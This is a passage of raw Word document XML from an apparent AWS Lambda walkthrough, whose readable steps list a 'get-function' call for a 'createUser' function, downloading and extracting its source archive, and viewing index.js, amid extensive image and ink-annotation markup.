          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C87D327" wp14:editId="26CE9593">
            <wp:extent cx="5731510" cy="619125"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="15875"/>
            <wp:docPr id="144" name="Picture 144" descr="page12image6635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ge12image663589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619125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="688A86AC" w14:textId="0574533C" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0094232C"/>
    <w:p w14:paraId="3C274CC7" w14:textId="7A922C9D" w:rsidR="0033705D" w:rsidRDefault="0094232C" w:rsidP="007B4A06">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 15: ​Get more details about the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:t>createUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve"> function</w:t>
      </w:r>
      <w:r w:rsidR="0033705D">
        <w:t>, we got while listing the lambda functions</w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71862487" w14:textId="5F4C4568" w:rsidR="0033705D" w:rsidRDefault="0033705D" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C0F7E4D" wp14:editId="33A23525">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>615960</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1251759</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1408680" cy="22680"/>
                <wp:effectExtent l="88900" t="139700" r="115570" b="142875"/>
                <wp:wrapNone/>
                <wp:docPr id="230" name="Ink 230"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId51">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1408680" cy="22680"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3501028A" id="Ink 230" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:44.25pt;margin-top:90.05pt;width:119.4pt;height:18.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">
                <v:imagedata r:id="rId52" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="0033705D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0033705D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page4image66207744" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0033705D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="0033705D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68199771" wp14:editId="38D3B6B3">
            <wp:extent cx="5731510" cy="2909570"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="11430"/>
            <wp:docPr id="229" name="Picture 229" descr="page4image6620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page4image662077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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0033705D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="255D75E3" w14:textId="70565C7E" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="0033705D">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lambda get-function --function-name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t>createUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094232C">
        <w:rPr>
          <w:rStyle w:val="HTMLSample"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CE9838" w14:textId="140FD946" w:rsidR="008A3F2C" w:rsidRDefault="008A3F2C" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="327D911D" wp14:editId="1B8C8344">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4733640</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2645875</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="921240" cy="360"/>
                <wp:effectExtent l="114300" t="215900" r="120650" b="21590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921240" cy="360"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0B28FC1D" id="Ink 238" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:365.7pt;margin-top:194.2pt;width:86.75pt;height:28.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">
                <v:imagedata r:id="rId55" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="64AEEA85" wp14:editId="6C480120">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5276160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3375235</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="428400" cy="360"/>
                <wp:effectExtent l="114300" t="215900" r="118110" b="215900"/>
                <wp:wrapNone/>
                <wp:docPr id="237" name="Ink 237"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId56">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="428400" cy="360"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1682239E" id="Ink 237" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:408.4pt;margin-top:251.6pt;width:47.95pt;height:28.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">
                <v:imagedata r:id="rId57" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16518766" wp14:editId="5050B323">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2151360</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2948275</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="433440" cy="360"/>
                <wp:effectExtent l="114300" t="215900" r="125730" b="215900"/>
                <wp:wrapNone/>
                <wp:docPr id="236" name="Ink 236"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId58">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="433440" cy="360"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="54BCB3D6" id="Ink 236" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:162.35pt;margin-top:218pt;width:48.3pt;height:28.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">
                <v:imagedata r:id="rId59" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="371DC41B" wp14:editId="41052F08">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1663200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2946115</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="538920" cy="360"/>
                <wp:effectExtent l="114300" t="215900" r="121920" b="215900"/>
                <wp:wrapNone/>
                <wp:docPr id="235" name="Ink 235"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId60">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="538920" cy="360"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4C3673B1" id="Ink 235" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:123.9pt;margin-top:217.85pt;width:56.65pt;height:28.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">
                <v:imagedata r:id="rId61" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4395F4D3" wp14:editId="122ED61E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2444040</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2876635</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3333600" cy="22320"/>
                <wp:effectExtent l="127000" t="215900" r="121285" b="206375"/>
                <wp:wrapNone/>
                <wp:docPr id="234" name="Ink 234"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId62">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="3333600" cy="22320"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="6C229B6A" id="Ink 234" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:185.4pt;margin-top:212.35pt;width:276.7pt;height:30.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">
                <v:imagedata r:id="rId63" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2883C491" wp14:editId="354E8142">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>102600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3037555</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5465520" cy="165960"/>
                <wp:effectExtent l="127000" t="215900" r="147955" b="215265"/>
                <wp:wrapNone/>
                <wp:docPr id="233" name="Ink 233"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId64">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5465520" cy="165960"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3CBFDCD7" id="Ink 233" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:1pt;margin-top:225.05pt;width:444.5pt;height:41.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">
                <v:imagedata r:id="rId65" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40F544AC" wp14:editId="21314E50">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>72720</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3337795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5171400" cy="119160"/>
                <wp:effectExtent l="127000" t="215900" r="150495" b="211455"/>
                <wp:wrapNone/>
                <wp:docPr id="232" name="Ink 232"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId66">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5171400" cy="119160"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2F60F456" id="Ink 232" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:-1.3pt;margin-top:248.65pt;width:421.4pt;height:37.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">
                <v:imagedata r:id="rId67" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3114B2BC" wp14:editId="7BFEDF4D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>71280</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2637955</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5375160" cy="62640"/>
                <wp:effectExtent l="127000" t="215900" r="149860" b="217170"/>
                <wp:wrapNone/>
                <wp:docPr id="231" name="Ink 231"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId68">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5375160" cy="62640"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="273ABC15" id="Ink 231" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:-1.45pt;margin-top:193.55pt;width:437.45pt;height:33.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">
                <v:imagedata r:id="rId69"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page13image66363312" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="426E7504" wp14:editId="06DACAB2">
            <wp:extent cx="5731510" cy="3559810"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="8890"/>
            <wp:docPr id="141" name="Picture 141" descr="page13image6636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ge13image663633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559810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBB82F2" w14:textId="77777777" w:rsidR="008A3F2C" w:rsidRDefault="008A3F2C" w:rsidP="0094232C"/>
    <w:p w14:paraId="7A97DE9C" w14:textId="3F0F083B" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="007368E3">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t>Step 16: ​Download the source archive</w:t>
      </w:r>
      <w:r w:rsidR="008A3F2C">
        <w:t xml:space="preserve"> from above Location </w:t>
      </w:r>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">click </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4403E1" w14:textId="768E9A1E" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="007368E3">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 17: ​Extract the archive. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7173A6FE" w14:textId="7DB1B26C" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="0094232C" w:rsidP="007368E3">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r w:rsidRPr="0094232C">
        <w:t xml:space="preserve">Step 18: ​View index.js file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728B4F6A" w14:textId="0F8CA289" w:rsidR="008A3F2C" w:rsidRDefault="00EA2F97" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21442E6C" wp14:editId="0FF0AC1E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>584296</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2997628</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1396080" cy="49320"/>
                <wp:effectExtent l="88900" t="139700" r="90170" b="141605"/>
                <wp:wrapNone/>
                <wp:docPr id="243" name="Ink 243"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId71">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1396080" cy="49320"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="56F23D2A" id="Ink 243" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:41.75pt;margin-top:227.55pt;width:118.45pt;height:20.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">
                <v:imagedata r:id="rId72" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79452C29" wp14:editId="5D325341">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>600496</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2782708</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1438920" cy="49320"/>
                <wp:effectExtent l="88900" t="139700" r="85090" b="141605"/>
                <wp:wrapNone/>
                <wp:docPr id="242" name="Ink 242"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId73">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1438920" cy="49320"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="48832243" id="Ink 242" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:43.05pt;margin-top:210.6pt;width:121.8pt;height:20.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">
                <v:imagedata r:id="rId74"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"/var/folders/b3/kyjkq9zj5hjbxs827xg70pc40000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/page15image66362064" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="008A3F2C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FFBA6DE" wp14:editId="3DF2FD50">
            <wp:extent cx="5731510" cy="3456940"/>
            <wp:effectExtent l="12700" t="12700" r="8890" b="10160"/>
            <wp:docPr id="133" name="Picture 133" descr="page15image6636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age15image663620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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0094232C" w:rsidRPr="0094232C">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA3FC0" w14:textId="2CC4DC67" w:rsidR="0094232C" w:rsidRPr="0094232C" w:rsidRDefault="008A3F2C" w:rsidP="0094232C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17482DC4" wp14:editId="122136AF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1105200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1900424</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2825640" cy="54000"/>
                <wp:effectExtent l="88900" t="139700" r="83185" b="136525"/>
                <wp:wrapNone/>
                <wp:docPr id="239" name="Ink 239"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId76">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2825640" cy="54000"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="14BCD60F" id="Ink 239" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:82.8pt;margin-top:141.15pt;width:231pt;height:21.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">
